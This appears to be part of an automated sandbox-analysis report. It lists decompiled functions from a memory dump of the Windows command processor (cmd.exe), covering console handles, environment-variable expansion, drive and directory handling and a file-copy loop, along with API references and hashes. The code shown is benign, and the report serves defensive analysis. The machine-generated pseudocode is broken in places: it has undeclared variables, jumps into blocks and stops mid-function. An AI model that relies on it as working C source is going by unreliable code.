Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: 35252ccf393044e940d2212e387d6e534cacc6bd17d556b742171ad7241b25ae
Instruction ID: b155f30381827ad05a01fb6fe7afe171e86cee53d179035a0c2b4c0588beb30a
Opcode Fuzzy Hash: 35252ccf393044e940d2212e387d6e534cacc6bd17d556b742171ad7241b25ae
Instruction Fuzzy Hash: D9119133804353AFEB115768AD4CFAA7AACE745721F280355E8A6E22A0C7348D059671

Uniqueness

Uniqueness Score: -1.00%

Function 00D9269C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00D926A7
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D8C5F8,?,?,?), ref: 00D926B6
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926D2
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,00000002), ref: 00D926E1
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D926EC
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926F5

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: bf9f273bef0f1947f607290ecf180f5bc746bd31e5d742f2599a5f8260d33d1e
Instruction ID: 321d5cc9483c5651e411ddd33a87ceccc966b6046c41be78cd5b2fba09e29904
Opcode Fuzzy Hash: bf9f273bef0f1947f607290ecf180f5bc746bd31e5d742f2599a5f8260d33d1e
Instruction Fuzzy Hash: 3601DB338142277B8F2013B89C4DD7A775CE6453317390365FC25E2AD0D9308C4552B4

Uniqueness

Uniqueness Score: -1.00%

Function 00D8FE10, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00D8FE10(void* __ebx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t38;
				signed int _t49;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				signed int _t73;
				signed int _t75;
				void* _t78;
				signed int _t79;
				short* _t80;
				signed int _t83;
				void* _t89;
				signed int _t91;
				signed int _t93;
				void* _t95;
				void* _t99;
				signed int _t102;
				signed int _t104;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				void* _t113;
				void* _t116;
				void* _t120;
				void* _t121;

				_t121 = _t120 - 0x14;
				_push(_t113);
				_t79 = 0x4002;
				_t35 = E00D900B0(0x4002);
				_v8 = _t35;
				_t104 = _t35;
				if(_t35 == 0) {
					memset(0xdb3890, 0, 0x4006);
					_t121 = _t121 + 0xc;
					 *0xdbb8a4 = 0xdb3892;
					__imp__longjmp(0xdbb8f8, 0xffffffff);
					goto L37;
				} else {
					_t113 =  *0xdbb8a4;
					_t102 = 0x2001;
					_t79 = _t35;
					_t78 = _t113 - _t35;
					while(1) {
						_t2 = _t102 + 0x7fffdffd; // 0x7ffffffe
						if(_t2 == 0) {
							break;
						}
						_t73 =  *(_t78 + _t79) & 0x0000ffff;
						if(_t73 == 0) {
							break;
						} else {
							 *_t79 = _t73;
							_t79 = _t79 + 2;
							_t102 = _t102 - 1;
							if(_t102 != 0) {
								continue;
							} else {
								L37:
								_t80 = _t79 - 2;
							}
						}
						goto L7;
					}
					__eflags = _t102;
					if(_t102 == 0) {
						goto L37;
					}
				}
				L7:
				_t75 = 0;
				 *_t80 = 0;
				_t81 = _t104;
				_v12 = 0;
				_t38 =  *_t104 & 0x0000ffff;
				if(_t38 == 0) {
					L13:
					 *0xdbb8a4 = 0xdb3892;
					 *_t113 = 0;
					if(_t75 > 0x2001) {
						__eflags = 0;
						 *0xdb3892 = 0;
						goto L40;
					} else {
						return E00D90040(_t81);
					}
				} else {
					while(1) {
						_t83 = _t104;
						_t104 = _t104 + 2;
						_v16 = _t83;
						if(_t75 > 0x2001) {
							break;
						}
						if(_t38 == 0x25) {
							_t93 =  *0xdc3cc4;
							__eflags = _t93;
							if(__eflags == 0) {
								L19:
								_t81 = E00D88F70(0xdbb8f8, _t104, __eflags,  &_v12, 0x25);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  *0xdc3cc4;
									_t113 =  *0xdbb8a4;
									if( *0xdc3cc4 == 0) {
										goto L33;
									} else {
										_t104 = _v16 + (_v12 + 1) * 2;
									}
									goto L11;
								} else {
									goto L20;
								}
							} else {
								_t54 =  *_t104 & 0x0000ffff;
								__eflags = _t54 - 0x25;
								if(_t54 == 0x25) {
									_t29 = _t83 + 4; // 0x4
									_t104 = _t29;
									L33:
									 *_t113 = 0x25;
									_t113 = _t113 + 2;
									_t75 = _t75 + 1;
									goto L24;
								} else {
									__eflags = _t54 - 0x2a;
									if(_t54 == 0x2a) {
										__eflags =  *0xdc3cc9;
										if( *0xdc3cc9 == 0) {
											goto L18;
										} else {
											_t99 =  *(_t93 + 0x34);
											_t18 = _t83 + 4; // 0x4
											_t104 = _t18;
											__eflags = _t99;
											if(_t99 == 0) {
												goto L11;
											} else {
												_t89 = _t99;
												_v16 = _t89 + 2;
												do {
													_t59 =  *_t89;
													_t89 = _t89 + 2;
													__eflags = _t59;
												} while (_t59 != 0);
												_t91 = _t89 - _v16 >> 1;
												_v20 = _t91;
												__eflags = _t91;
												if(_t91 <= 0) {
													goto L11;
												} else {
													_t60 = _t91 + _t75;
													_v16 = _t60;
													__eflags = _t60 - 0x2000;
													if(_t60 > 0x2000) {
														memcpy(_t113, _t99, 0x2000 - _t75 + 0x2000 - _t75);
														 *0xdb7892 = 0;
														E00D8C5A2(_t91, 0x234f, 1, 0xdb3892);
														goto L41;
													} else {
														E00D91040(_t113, 0x2003 - (_t113 - 0xdb3890 >> 1), _t99);
														_t75 = _v16;
														_t113 = _t113 + _v20 * 2;
														 *0xdbb8a4 = _t113;
														goto L11;
													}
												}
											}
										}
									} else {
										L18:
										_t81 = E00D91969(0xdbb8f8, _t104,  &_v12, L"0123456789", _t93 + 0x3c);
										__eflags = _t81;
										if(__eflags != 0) {
											L20:
											_t108 = _t81;
											_t10 = _t108 + 2; // 0x2
											_t95 = _t10;
											do {
												_t49 =  *_t108;
												_t108 = _t108 + 2;
												__eflags = _t49;
											} while (_t49 != 0);
											_t110 = _t108 - _t95 >> 1;
											_t75 = _t75 + _t110;
											__eflags = _t75 - 0x2001;
											if(_t75 > 0x2001) {
												L40:
												_push(0);
												_push(0x233f);
												E00D8C5A2(_t81);
												L41:
												_t82 = _v8;
												E00D90040(_v8);
												__imp__longjmp(0xdbb8f8, 0xffffffff);
												asm("int3");
												_push(0);
												_push(8);
												E00D8C5A2(_t82);
												__eflags = 0;
												return 0;
											} else {
												_t116 =  *0xdbb8a4;
												E00D91040(_t116, 0x2003 - (_t116 - 0xdb3890 >> 1), _t81);
												_t113 = _t116 + _t110 * 2;
												_t112 = _v12 + 1;
												__eflags = _t112;
												_t104 = _v16 + _t112 * 2;
												L24:
												 *0xdbb8a4 = _t113;
												goto L11;
											}
										} else {
											goto L19;
										}
									}
								}
							}
						} else {
							 *_t113 = _t38;
							_t75 = _t75 + 1;
							_t113 = _t113 + 2;
							 *0xdbb8a4 = _t113;
							if(_t38 == 0xa) {
								break;
							} else {
								L11:
								_t38 =  *_t104 & 0x0000ffff;
								if(_t38 != 0) {
									continue;
								} else {
									break;
								}
							}
						}
						goto L43;
					}
					_t81 = _v8;
					goto L13;
				}
				L43:
			}

0x00d8fe15
0x00d8fe19
0x00d8fe1b
0x00d8fe20
0x00d8fe25
0x00d8fe28
0x00d8fe2c
0x00d9c954
0x00d9c959
0x00d9c95c
0x00d9c96d
0x00000000
0x00d8fe32
0x00d8fe32
0x00d8fe38
0x00d8fe3f
0x00d8fe41
0x00d8fe43
0x00d8fe43
0x00d8fe4b
0x00000000
0x00000000
0x00d8fe4d
0x00d8fe54
0x00000000
0x00d8fe56
0x00d8fe56
0x00d8fe59
0x00d8fe5c
0x00d8fe5f
0x00000000
0x00d8fe61
0x00d9c973
0x00d9c973
0x00d9c973
0x00d8fe5f
0x00000000
0x00d8fe54
0x00d8fe66
0x00d8fe68
0x00000000
0x00000000
0x00d8fe68
0x00d8fe6e
0x00d8fe70
0x00d8fe72
0x00d8fe75
0x00d8fe77
0x00d8fe7a
0x00d8fe80
0x00d8feb6
0x00d8feb8
0x00d8fec2
0x00d8fecb
0x00d9c9ad
0x00d9c9af
0x00000000
0x00d8fed1
0x00d8fedc
0x00d8fedc
0x00d8fe82
0x00d8fe82
0x00d8fe82
0x00d8fe84
0x00d8fe87
0x00d8fe90
0x00000000
0x00000000
0x00d8fe96
0x00d8fedd
0x00d8fee3
0x00d8fee5
0x00d8ff1b
0x00d8ff2d
0x00d8ff2f
0x00d8ff31
0x00d90022
0x00d90029
0x00d9002f
0x00000000
0x00d90031
0x00d90038
0x00d90038
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8fee7
0x00d8fee7
0x00d8feea
0x00d8feed
0x00d9000e
0x00d9000e
0x00d90011
0x00d90016
0x00d90019
0x00d9001c
0x00000000
0x00d8fef3
0x00d8fef3
0x00d8fef6
0x00d8ff93
0x00d8ff9a
0x00000000
0x00d8ffa0
0x00d8ffa0
0x00d8ffa3
0x00d8ffa3
0x00d8ffa6
0x00d8ffa8
0x00000000
0x00d8ffae
0x00d8ffae
0x00d8ffb3
0x00d8ffb6
0x00d8ffb6
0x00d8ffb9
0x00d8ffbc
0x00d8ffbc
0x00d8ffc4
0x00d8ffc6
0x00d8ffc9
0x00d8ffcb
0x00000000
0x00d8ffd1
0x00d8ffd1
0x00d8ffd4
0x00d8ffd7
0x00d8ffdc
0x00d9c987
0x00d9c991
0x00d9c9a3
0x00000000
0x00d8ffe2
0x00d8fff5
0x00d8fffd
0x00d90000
0x00d90003
0x00000000
0x00d90003
0x00d8ffdc
0x00d8ffcb
0x00d8ffa8
0x00d8fefc
0x00d8fefc
0x00d8ff15
0x00d8ff17
0x00d8ff19
0x00d8ff37
0x00d8ff37
0x00d8ff39
0x00d8ff39
0x00d8ff40
0x00d8ff40
0x00d8ff43
0x00d8ff46
0x00d8ff46
0x00d8ff4d
0x00d8ff4f
0x00d8ff51
0x00d8ff57
0x00d9c9b5
0x00d9c9b5
0x00d9c9b7
0x00d9c9bc
0x00d9c9c4
0x00d9c9c4
0x00d9c9c7
0x00d9c9d3
0x00d9c9d9
0x00d9c9da
0x00d9c9dc
0x00d9c9de
0x00d9c9e6
0x00d9c9e9
0x00d8ff5d
0x00d8ff5d
0x00d8ff76
0x00d8ff7e
0x00d8ff84
0x00d8ff84
0x00d8ff85
0x00d8ff88
0x00d8ff88
0x00000000
0x00d8ff88
0x00000000
0x00000000
0x00000000
0x00d8ff19
0x00d8fef6
0x00d8feed
0x00d8fe98
0x00d8fe98
0x00d8fe9b
0x00d8fe9c
0x00d8fe9f
0x00d8fea9
0x00000000
0x00d8feab
0x00d8feab
0x00d8feab
0x00d8feb1
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8feb1
0x00d8fea9
0x00000000
0x00d8fe96
0x00d8feb3
0x00000000
0x00d8feb3
0x00000000

APIs

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

memset.MSVCRT ref: 00D9C954
longjmp.MSVCRT(00DBB8F8,000000FF,00000000,00DB3892,00DB3890,?,?,?,?,00D8FD5C,?,?,?,00D9837D,00000000), ref: 00D9C96D
memcpy.MSVCRT ref: 00D9C987
longjmp.MSVCRT(00DBB8F8,000000FF,00DB3892,00DB3890,?,?,?,?,00D8FD5C,?,?,?,00D9837D,00000000), ref: 00D9C9D3

Strings

0123456789, xrefs: 00D8FF05

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heaplongjmp$AllocProcessmemcpymemset
String ID: 0123456789
API String ID: 2034586978-2793719750
Opcode ID: d99e8db33896f5b6e0c69dd0599e0c41c6b6d813cf0ba8769dd0a7a60f5077f3
Instruction ID: 4c2379ceccae471e4e651fe145f1dc633eaa6e5abde2ccdd3d4efb16dc0e4f1b
Opcode Fuzzy Hash: d99e8db33896f5b6e0c69dd0599e0c41c6b6d813cf0ba8769dd0a7a60f5077f3
Instruction Fuzzy Hash: E9710579A00302DBDF24AB28DC457BA77A5EF84310F184179E949EB391EB749E46C770

Uniqueness

Uniqueness Score: -1.00%

Function 00D96390, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00D96390(void* __ecx, long __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				void* _v36;
				void _v556;
				signed int _v560;
				signed short* _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				intOrPtr _t47;
				void* _t54;
				void* _t61;
				signed int _t64;
				signed int _t68;
				signed int _t69;
				signed int _t71;
				signed int _t78;
				signed int _t83;
				signed short* _t92;
				void* _t97;
				signed int _t100;
				intOrPtr _t102;
				void* _t103;
				signed int _t104;
				signed short* _t106;
				int _t108;
				void* _t109;
				signed int _t110;
				signed int _t115;

				_t95 = __edx;
				_t71 = _t115;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t71 + 4));
				_t113 = (_t115 & 0xfffffff8) + 4;
				_t35 =  *0xdad0b4; // 0x35c4fbb8
				_v16 = _t35 ^ (_t115 & 0xfffffff8) + 0x00000004;
				_t102 =  *((intOrPtr*)(_t71 + 8));
				_t108 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E00D90C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t47 = 1;
					L32:
					_t108 = _t47;
					L10:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t103);
					_pop(_t109);
					return E00D96FD0(_t108, _t71, _v16 ^ _t113, _t95, _t103, _t109);
				}
				_t104 = E00D8EA40( *((intOrPtr*)(_t102 + 0x3c)), 0xd824ac, (0 |  *0xdc3cc9 != 0x00000000) + 2);
				_v560 = _t104;
				if( *0xdc3cc9 == 0) {
					L4:
					_t78 = _t104;
					_t17 = _t78 + 2; // 0x2
					_t97 = _t17;
					do {
						_t54 =  *_t78;
						_t78 = _t78 + 2;
					} while (_t54 != _t108);
					_v560 = _t78 - _t97 >> 1;
					E00D91040(_t104, _v560 + 1, E00D922C0(_t71, _t104));
					_t95 =  *_t104 & 0x0000ffff;
					if(_t95 != 0) {
						_t83 = _t104;
						_t26 = _t83 + 2; // 0x2
						_v560 = _t26;
						do {
							_t58 =  *_t83;
							_t83 = _t83 + 2;
						} while (_t58 != _t108);
						if(_t83 - _v560 >> 1 != 2 ||  *((short*)(_t104 + 2)) != 0x3a || iswalpha(_t95) == 0) {
							_t47 = E00DA8371(_t58, _t104);
							 *0xdbb8b0 = _t47;
							goto L32;
						} else {
							_t88 = _v36;
							if(_v36 == 0) {
								_t88 =  &_v556;
							}
							_t95 = _v28;
							E00D936CB(_t71, _t88, _v28,  *_t104 & 0x0000ffff);
							_t61 = _v36;
							if(_t61 == 0) {
								_t61 =  &_v556;
							}
							L9:
							_push(_t61);
							E00D925D9(L"%s\r\n");
							 *0xdbb8b0 = _t108;
							goto L10;
						}
					}
					_t91 =  *0xdc3cb8;
					if( *0xdc3cb8 == 0) {
						_t91 = 0xdc3ab0;
					}
					_t95 =  *0xdc3cc0;
					E00D936CB(_t71, _t91,  *0xdc3cc0, _t108);
					_t61 =  *0xdc3cb8;
					if(_t61 == 0) {
						_t61 = 0xdc3ab0;
					}
					goto L9;
				}
				_t64 =  *_t104 & 0x0000ffff;
				_t92 = _t104;
				_t110 = _t104;
				if(_t64 != 0) {
					_t100 = _t64;
					do {
						 *_t110 = _t100;
						if(_t100 == 0) {
							L17:
							_v564 =  &(_t92[1]);
							while(1) {
								_t23 = _t110 - 2; // -4
								_t106 = _t23;
								if(iswspace( *_t106 & 0x0000ffff) == 0) {
									goto L20;
								}
								_t110 = _t106;
							}
							goto L20;
						} else {
							goto L16;
						}
						do {
							L16:
							_t92 =  &(_t92[1]);
							_t110 = _t110 + 2;
							_t69 =  *_t92 & 0x0000ffff;
							 *_t110 = _t69;
						} while (_t69 != 0);
						goto L17;
						L20:
						_t92 = _v564;
						 *_t110 = 0;
						_t110 = _t110 + 2;
						_t68 =  *_t92 & 0x0000ffff;
						_t100 = _t68;
					} while (_t68 != 0);
					_t104 = _v560;
				}
				 *_t110 = 0;
				_t108 = 0;
				goto L4;
			}

0x00d96390
0x00d96393
0x00d96395
0x00d96396
0x00d963a1
0x00d963a5
0x00d963ad
0x00d963b4
0x00d963b9
0x00d963c2
0x00d963c4
0x00d963cd
0x00d963d2
0x00d963d6
0x00d963ff
0x00d9f71c
0x00d9f7f0
0x00d9f7f0
0x00d964bc
0x00d964bf
0x00d964cb
0x00d964ce
0x00d964da
0x00d964da
0x00d96428
0x00d9642a
0x00d96430
0x00d96449
0x00d96449
0x00d9644b
0x00d9644b
0x00d9644e
0x00d9644e
0x00d96451
0x00d96454
0x00d9645d
0x00d96474
0x00d96479
0x00d9647f
0x00d9f77f
0x00d9f781
0x00d9f784
0x00d9f78a
0x00d9f78a
0x00d9f78d
0x00d9f790
0x00d9f7a0
0x00d9f7e6
0x00d9f7eb
0x00000000
0x00d9f7b5
0x00d9f7b5
0x00d9f7ba
0x00d9f7bc
0x00d9f7bc
0x00d9f7c5
0x00d9f7c9
0x00d9f7ce
0x00d9f7d3
0x00d9f7d9
0x00d9f7d9
0x00d964a9
0x00d964a9
0x00d964af
0x00d964b6
0x00000000
0x00d964b6
0x00d9f7a0
0x00d96485
0x00d96492
0x00d964dd
0x00d964dd
0x00d96494
0x00d9649b
0x00d964a0
0x00d964a7
0x00d964e1
0x00d964e1
0x00000000
0x00d964a7
0x00d96432
0x00d96435
0x00d96437
0x00d9643c
0x00d9f722
0x00d9f724
0x00d9f724
0x00d9f72a
0x00d9f73d
0x00d9f740
0x00d9f74a
0x00d9f74a
0x00d9f74a
0x00d9f75a
0x00000000
0x00000000
0x00d9f748
0x00d9f748
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9f72c
0x00d9f72c
0x00d9f72c
0x00d9f72f
0x00d9f732
0x00d9f735
0x00d9f738
0x00000000
0x00d9f75c
0x00d9f75c
0x00d9f764
0x00d9f767
0x00d9f76a
0x00d9f76d
0x00d9f76f
0x00d9f774
0x00d9f774
0x00d96444
0x00d96447
0x00000000

APIs

memset.MSVCRT ref: 00D963D6

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EAB7
Part of subcall function 00D8EA40: iswspace.MSVCRT ref: 00D8EB2D
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB49
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB6D

??_V@YAXPAX@Z.MSVCRT ref: 00D964BF
iswspace.MSVCRT ref: 00D9F751

Strings

%s, xrefs: 00D964AA

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcschr$iswspacememset
String ID: %s
API String ID: 2220997661-3043279178
Opcode ID: ca9b19a5ff7ad609b258ea758da0815ce2d88359e175d7196e8e7ce46887f201
Instruction ID: 458f562d34f3ce3e6514344e8a286d0f93273524e13ab86b4d0642340fa569ab
Opcode Fuzzy Hash: ca9b19a5ff7ad609b258ea758da0815ce2d88359e175d7196e8e7ce46887f201
Instruction Fuzzy Hash: B251B375A002169BCF24EFA8D8956BAB7E5EF54350F28416EE846D7340EB34DD41CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA85E9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00DA85E9(intOrPtr __ecx, signed int __edx) {
				signed int _v20;
				int _v32;
				char _v36;
				int _v40;
				void _v560;
				int _v568;
				char _v572;
				int _v576;
				void _v1096;
				int _v1104;
				char _v1108;
				int _v1112;
				void* _v1124;
				void _v1632;
				intOrPtr _v1636;
				signed int _v1640;
				int _v1644;
				signed int* _v1648;
				signed int* _v1652;
				signed int _v1656;
				intOrPtr _v1660;
				char _v1664;
				void* _v1668;
				void* _v1672;
				void* _v1676;
				void* _v1680;
				void* _v1684;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t196;
				signed int _t198;
				void* _t218;
				void* _t232;
				signed int _t236;
				void* _t237;
				signed int _t239;
				void* _t240;
				signed int _t241;
				signed int _t242;
				signed int _t244;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				signed char _t258;
				intOrPtr _t260;
				void* _t263;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t276;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t282;
				signed int _t290;
				signed int _t291;
				void* _t292;
				signed int _t293;
				signed int _t295;
				void* _t296;
				signed int _t297;
				void* _t298;
				signed int _t299;
				void* _t300;
				void* _t303;
				intOrPtr _t305;
				signed int _t307;
				void* _t316;
				void* _t317;
				signed int _t346;
				void* _t348;
				void* _t352;
				intOrPtr _t354;
				intOrPtr _t356;
				void* _t357;
				WCHAR* _t358;
				signed int _t359;
				signed int _t368;
				intOrPtr _t371;
				signed int _t392;
				signed int _t412;
				void* _t414;
				signed int _t416;
				signed int _t418;
				intOrPtr _t419;
				void* _t420;
				signed int* _t421;
				void* _t422;
				signed int _t426;
				signed int _t428;
				signed int _t431;
				void* _t435;

				_t391 = __edx;
				_t318 = __ecx;
				_t418 = __edx;
				if(__ecx != 0) {
					_push(0);
					_push(__ecx);
					E00D8C108(__ecx);
					_pop(_t318);
				}
				if(_t418 == 1) {
					_t418 = 0xdc3d00;
					E00D9274C(0xdc3d00, 0x104, L"%9d",  *0xdad56c);
					E00D8C108(_t318, 0x2336, 1, 0xdc3d00);
					_t426 = _t426 + 0x1c;
				}
				 *0xdad560 =  *0xdc8064 & 0x000000ff;
				while(1) {
					_t196 =  *0xdad5dc; // 0x0
					_t435 =  *0xdad568 - _t196; // 0x0
					if(_t435 >= 0) {
						break;
					}
					_t318 =  *((intOrPtr*)( *0xdc3cf4 + _t196 * 4 - 4));
					E00D8CD27(_t318);
				}
				__imp__longjmp(0xdbb8f8, 1);
				asm("int3");
				_t428 = (_t426 & 0xfffffff8) - 0x67c;
				_t198 =  *0xdad0b4; // 0x35c4fbb8
				_v20 = _t198 ^ _t428;
				_push(_t418);
				_push(_t412);
				_v1640 = _t391;
				_t419 = _t318;
				_v1104 = 0x104;
				_v1644 = 0;
				_t316 = 1;
				_v1112 = 0;
				_t413 = _t412 | 0xffffffff;
				_v1108 = 1;
				memset( &_v1632, 0, 0x104);
				_v36 = 1;
				_v32 = 0x104;
				_v40 = 0;
				memset( &_v560, 0, 0x104);
				_v572 = 1;
				_v568 = 0x104;
				_v576 = 0;
				memset( &_v1096, 0, 0x104);
				_t431 = _t428 + 0x24;
				if(E00D90C70( &_v1632, ((0 | _v1108 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00D90C70( &_v560, ((0 | _v36 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E00D90C70( &_v1096, ((0 | _v572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L141:
					E00D90DE8(E00D90DE8(E00D90DE8(_t214,  &_v1096),  &_v560),  &_v1632);
					_t218 = _t316;
				} else {
					_t214 = E00D8585F(0xfe00,  &_v1648, 0);
					_v1668 = _t214;
					if(_t214 == 0) {
						goto L141;
					} else {
						if( *0xdad560 == 0) {
							_t232 = _v1648;
							goto L17;
						} else {
							_v1652 = _v1648;
							_t214 = E00D8585F(_v1648,  &_v1668, 1);
							_v1652 = _t214;
							if(_t214 != 0) {
								if(_v1648 >= _v1668) {
									_t232 = _v1668;
									L17:
									_v1652 = _t232;
								}
								_t421 =  *(_t419 + 0x20);
								_v1648 = _t421;
								while(1) {
									_t214 = E00D8AD44( *_t421);
									if(_t214 != 0) {
										break;
									}
									_t421 = _t421[8];
									_v1648 = _t421;
									if(_t421 != 0) {
										continue;
									} else {
										_t316 = _t214;
										goto L141;
									}
									goto L142;
								}
								_t391 =  *_t421;
								__eflags = 0;
								E00D968BA(E00D96A00,  *_t421, 0x21, 0, _t421[6],  &_v1664);
								while(1) {
									_t421[7] = _t421[7] & 0xffff3fff;
									_t236 = _t421[7];
									__eflags = _t236 & 0x00000004;
									if((_t236 & 0x00000004) != 0) {
										_t307 = _t236 & 0xfffffffb | 0x00000002;
										__eflags = _t307;
										_t421[7] = _t307;
									}
									__eflags =  *0xdad544;
									if( *0xdad544 != 0) {
										break;
									}
									_t391 = _v40;
									__eflags = _v40;
									if(_v40 == 0) {
										_t391 =  &_v560;
									}
									_t237 = E00D8579C(_t421, _t391, _v32);
									__eflags = _t237 - _t316;
									if(_t237 == _t316) {
										break;
									} else {
										_push(_t421[1]);
										E00D925D9(L"%s\r\n");
										_t239 = _v1112;
										__eflags = _t239;
										if(_t239 == 0) {
											_t239 =  &_v1632;
										}
										_t391 = _v1640;
										_t240 = E00D85226(_t421, _v1640, _t239, _v1104, 0);
										__eflags = _t240 - _t316;
										if(_t240 == _t316) {
											break;
										} else {
											_t392 = _v1112;
											_t241 = _t392;
											__eflags = _t392;
											if(_t392 == 0) {
												_t241 =  &_v1632;
											}
											__eflags =  *_t241;
											if( *_t241 != 0) {
												__eflags = _t392;
												if(_t392 == 0) {
													_t392 =  &_v1632;
												}
												_t244 = E00DA8F66(_t421[1], _t392);
												_t346 = _t421[1];
												__eflags = _t244;
												if(_t244 == 0) {
													_t422 = E00D85DB5(_t346, (_t421[7] & 0x00000800) << 0xa, _t346, _t346);
													__eflags = _t422 - 0xffffffff;
													if(_t422 == 0xffffffff) {
														E00D8CD27(_v1664);
														L135:
														_t348 = 0x6e;
														E00DA985A(_t348);
														L130:
														__eflags = 0;
														E00DA85E9(0, _t316);
														L131:
														E00D8CD27(_v1664);
														E00D8DB92(_t422);
														_t352 = _v1668;
														L129:
														E00D8DB92(_t352);
														goto L130;
													}
													_t252 = E00D90178(_t245);
													__eflags = _t252;
													if(_t252 == 0) {
														_t354 = _v1652;
													} else {
														_t354 = 0x80;
														_v1652 = 0x80;
													}
													_t253 = _v1112;
													__eflags = _t253;
													if(_t253 == 0) {
														_t253 =  &_v1632;
													}
													_t415 = _v1648;
													_t255 = E00D85712(_t422, _v1660, _t354,  &_v1656, _v1648, _t413, _t253);
													__eflags =  *0xdc3cf0;
													_v1656 = _t255;
													if( *0xdc3cf0 != 0) {
														_t356 = _v1664;
														L137:
														E00D8CD27(_t356);
														_t357 = _t422;
														L134:
														E00D8DB92(_t357);
														goto L135;
													}
													_t358 = _v1112;
													__eflags = _t358;
													if(_t358 == 0) {
														_t358 =  &_v1632;
													}
													_t258 = GetFileAttributesW(_t358);
													_t359 = _v1112;
													__eflags = _t258 & 0x00000002;
													if((_t258 & 0x00000002) != 0) {
														__eflags = _t359;
														if(_t359 == 0) {
															_t359 =  &_v1632;
														}
														_t360 = E00D85DB5(_t359, _t316, _t359, _t359);
														_v1680 = _t360;
														_v1676 = _t360;
													} else {
														__eflags = _t359;
														if(__eflags == 0) {
															_t359 =  &_v1632;
														}
														_t303 = E00D843A0(_t359, __eflags);
														_v1672 = _t303;
														_v1668 = _t303;
														__eflags = _t303 - 0xffffffff;
														if(_t303 == 0xffffffff) {
															L136:
															_t356 = _v1664;
															goto L137;
														}
